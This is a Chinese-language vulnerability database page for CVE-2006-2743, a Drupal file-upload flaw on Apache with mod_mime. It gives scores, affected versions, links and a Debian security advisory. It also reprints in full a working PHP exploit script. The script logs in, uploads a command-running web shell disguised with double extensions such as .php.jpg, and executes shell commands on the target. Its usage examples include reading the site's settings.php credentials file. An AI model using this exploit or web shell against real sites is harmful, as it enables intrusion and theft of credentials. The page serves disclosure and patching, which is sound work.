CVE-2006-2743
CVSS5.1
发布时间 :2006-06-01 06:02:00
修订时间 :2011-03-07 21:36:56
NMCOEP    

[原文]Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.


[CNNVD]Drupal 多个输入验证漏洞(CNNVD-200606-027)

        Drupal 当运行于带有mod_mime的Apache之上时,未正确处理带有多个扩展名的文件,远程攻击者可上载、修改或执行文件目录中的任意文件。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:drupal:drupal:4.6.6
cpe:/a:drupal:drupal:4.6.0
cpe:/a:drupal:drupal:4.6.1
cpe:/a:drupal:drupal:4.6.3
cpe:/a:drupal:drupal:4.7.0
cpe:/a:drupal:drupal:4.6
cpe:/a:drupal:drupal:4.6.5
cpe:/a:drupal:drupal:4.6.2
cpe:/a:drupal:drupal:4.6.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2743
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2743
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-027
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/26655
(PATCH)  XF  drupal-files-script-execution(26655)
http://secunia.com/advisories/20140
(VENDOR_ADVISORY)  SECUNIA  20140
http://drupal.org/node/65409
(VENDOR_ADVISORY)  CONFIRM  http://drupal.org/node/65409
http://www.vupen.com/english/advisories/2006/1975
(UNKNOWN)  VUPEN  ADV-2006-1975
http://www.securityfocus.com/bid/18245
(UNKNOWN)  BID  18245
http://www.securityfocus.com/archive/1/archive/1/435794/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060602 [DRUPAL-SA-2006-006] Drupal 4.6.7 / 4.7.1 fixes arbitrary file execution issue
http://www.debian.org/security/2006/dsa-1125
(UNKNOWN)  DEBIAN  DSA-1125
http://secunia.com/advisories/21244
(UNKNOWN)  SECUNIA  21244
http://milw0rm.com/exploits/1821
(UNKNOWN)  MILW0RM  1821

- 漏洞信息

Drupal 多个输入验证漏洞
中危 输入验证
2006-06-01 00:00:00 2006-06-01 00:00:00
远程  
        Drupal 当运行于带有mod_mime的Apache之上时,未正确处理带有多个扩展名的文件,远程攻击者可上载、修改或执行文件目录中的任意文件。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Drupal Drupal 4.5.3
        Debian drupal_4.5.3-6.1sarge1_all.debDebian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1
        sarge1_all.deb

- 漏洞信息 (1821)

Drupal <= 4.7 (attachment mod_mime) Remote Exploit (EDBID:1821)
php webapps
2006-05-24 Verified
0 rgod
N/A [点击下载]
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Drupal <= 4.7 attachment mod_mime poc exploit\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";

/*
this works with a user account with upload rights and with permissions to modify
stories, however this is only a poc, you can do the same uploading an attachment,
like this, with double extension, through all modules:

attach.php.pps

with this content:
*/

$shell=
'<?php
if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
ini_set("max_execution_time",0);
echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);
passthru($_GET[cmd]);
echo chr(0x2A).chr(0x64).chr(0x65).chr(0x6C).chr(0x69).chr(0x2A);
?>';

/*
then:

http://[target]/[path]/files/attach.php.pps?cmd=ls%20-la

also, I noticed that from an admin account you can upload .php3 or .php5 files
*/

if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to Drupal\r\n";
echo "user-pass: valid credentials with upload rights\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /drupal/ user password cat ./../sites/default/settings.php\r\n";
echo "php ".$argv[0]." localhost /drupal/ user password ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / user password ls -la -P1.1.1.1:80\r\n";
die;
}

ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$cmd="";$port=80;$proxy="";

for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

srand(make_seed());
$anumber = rand(1,99999);

  $data ="edit%5Bname%5D=".$user;
  $data.="&edit%5Bpass%5D=".$pass;
  $data.="&edit%5Bform_id%5D=user_login";
  $data.="&op=Log%20in";
  $packet="POST ".$path."?q=user/login&destination=node HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Accept-Encoding: gzip, deflate\r\n";
  $packet.="Accept-Language: it\r\n";
  $packet.="Referer: http://".$host.$path."\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Cache-Control: no-cache\r\n";
  $packet.="Connection: close\r\n\r\n";
  $packet.=$data;
// echo quick_dump($packet);
  sendpacketii($packet);
  $temp=explode("Set-Cookie: ",$html);
  $temp2=explode(" ",$temp[2]);
  $cookie=$temp2[0];
  echo "\r\nCookie -> ".$cookie."\r\n\r\n";


$ext= array(".php.jpg",".php.jpeg",".php.gif", ".php.png",".php.txt",".php.html",".php.doc",".php.xls",".php.pdf",".php.ppt",".php.pps");

for ($x=0; $x<=count($ext)-1;$x++)
{
echo "Trying with ".$ext[$x]." extension...\r\n";
$d=date("Y-m-d");
$data='-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[title]"

titolo
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[body]"

corpo
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[format]"

1
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[form_id]"

story_node_form
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[name]"

'.$user.'
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[date]"

'.$d.' 23:59:59 +0000
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[status]"

1
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[promote]"

1
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[comment]"

2
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[path]"


-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[menu][title]"


-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[menu][description]"


-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[menu][pid]"

1
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[menu][path]"


-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[menu][weight]"

0
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[menu][mid]"

0
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[menu][type]"

86
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[upload]"; filename="suntzu'.$anumber.$ext[$x].'"
Content-Type: image/jpeg

'.$shell.'
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="fileop"

Attach
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[fileop]"

http://'.$host.$path.'?q=upload/js
-----------------------------7d6381c1b00a2
Content-Disposition: form-data; name="edit[vid]"


-----------------------------7d6381c1b00a2--
';

$packet="POST ".$p."?q=upload/js HTTP/1.0\r\n";
$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6381c1b00a2\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Keep-Alive\r\n\r\n";
$packet.=$data;
//echo quick_dump($packet);
sendpacketii($packet);

$data='-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[title]"

titolo
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[body]"

corpo
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[format]"

1
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[form_id]"

story_node_form
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[name]"

'.$user.'
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[date]"

'.$d.' 23:59:59 +0000
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[status]"

1
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[promote]"

1
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[comment]"

2
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[path]"


-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[menu][title]"


-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[menu][description]"


-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[menu][pid]"

1
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[menu][path]"


-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[menu][weight]"

0
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[menu][mid]"

0
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[menu][type]"

86
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[files][upload_0][list]"

1
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[files][upload_0][description]"

hello.txt
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[upload]"; filename=""
Content-Type: image/jpeg


-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[fileop]"

http://'.$host.$path.'?q=upload/js
-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="edit[vid]"


-----------------------------7d6318101b00a2
Content-Disposition: form-data; name="op"

Submit
-----------------------------7d6318101b00a2--
';

$packet="POST ".$p."?q=node/add/story HTTP/1.0\r\n";
$packet.="Referer: http://".$host.$path."/?q=node/add/story\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6318101b00a2\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Keep-Alive\r\n\r\n";
$packet.=$data;
//echo quick_dump($packet);
sendpacketii($packet);

$packet ="GET ".$p."files/suntzu".$anumber.$ext[$x]."?cmd=".$cmd." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
//echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"*deli*"))
{echo "Exploit succeeded...\r\n";
 $temp=explode("*deli*",$html);
 die($temp[1]);
}
}
//if you are here...
echo "Exploit failed...";
?>

# milw0rm.com [2006-05-24]
		

- 漏洞信息 (F48640)

Debian Linux Security Advisory 1125-1 (PacketStormID:F48640)
2006-07-28 00:00:00
Debian  debian.org
advisory,remote,web,arbitrary,vulnerability
linux,debian
CVE-2006-2742,CVE-2006-2743,CVE-2006-2831,CVE-2006-2832,CVE-2006-2833
[点击下载]

Debian Security Advisory 1125-1 - Several remote vulnerabilities have been discovered in the Drupal web site platform, which may lead to the execution of arbitrary web scripts.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1125-1                    security@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
July 26th, 2006                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : drupal
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2742 CVE-2006-2743 CVE-2006-2831 CVE-2006-2832 CVE-2006-2833
Debian Bug     : 368835

Several remote vulnerabilities have been discovered in the Drupal web site
platform, which may lead to the execution of arbitrary web script. The
Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2006-2742

    A SQL injection vulnerability has been discovered in the "count" and
    "from" variables of the database interface.

CVE-2006-2743

    Multiple file extensions were handled incorrectly if Drupal ran on
    Apache with mod_mime enabled.

CVE-2006-2831

    A variation of CVE-2006-2743 was adressed as well.

CVE-2006-2832

    A Cross-Site-Scripting vulnerability in the upload module has been
    discovered.

CVE-2006-2833

    A Cross-Site-Scripting vulnerability in the taxonomy module has been
    discovered.

For the stable distribution (sarge) these problems have been fixed in
version 4.5.3-6.1sarge1.

For the unstable distribution (sid) these problems have been fixed in
version 4.5.8-1.1.

We recommend that you upgrade your drupal packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1.dsc
      Size/MD5 checksum:      625 8323ad6164c5beb6e9c7631272fbaee8
    http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1.diff.gz
      Size/MD5 checksum:    83802 35863480a9da96adbe6731b014d204c8
    http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3.orig.tar.gz
      Size/MD5 checksum:   471540 bf093c4c8aca7bba62833ea1df35702f

  Architecture independent components:

    http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.1sarge1_all.deb
      Size/MD5 checksum:   506884 e4cdba2730662752d8f83fc101ab58a5


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEx9wrXm3vHE4uyloRAsWtAKDoQf4DhL4eqpPLmDuifZ/Rh4h61gCggvrQ
zwceOEHQ/r/GyRU2L5X9vd8=
=V7nw
-----END PGP SIGNATURE-----

    

- 漏洞信息

25909
Drupal on Apache files Directory File Upload Arbitrary Code Execution
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-24 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站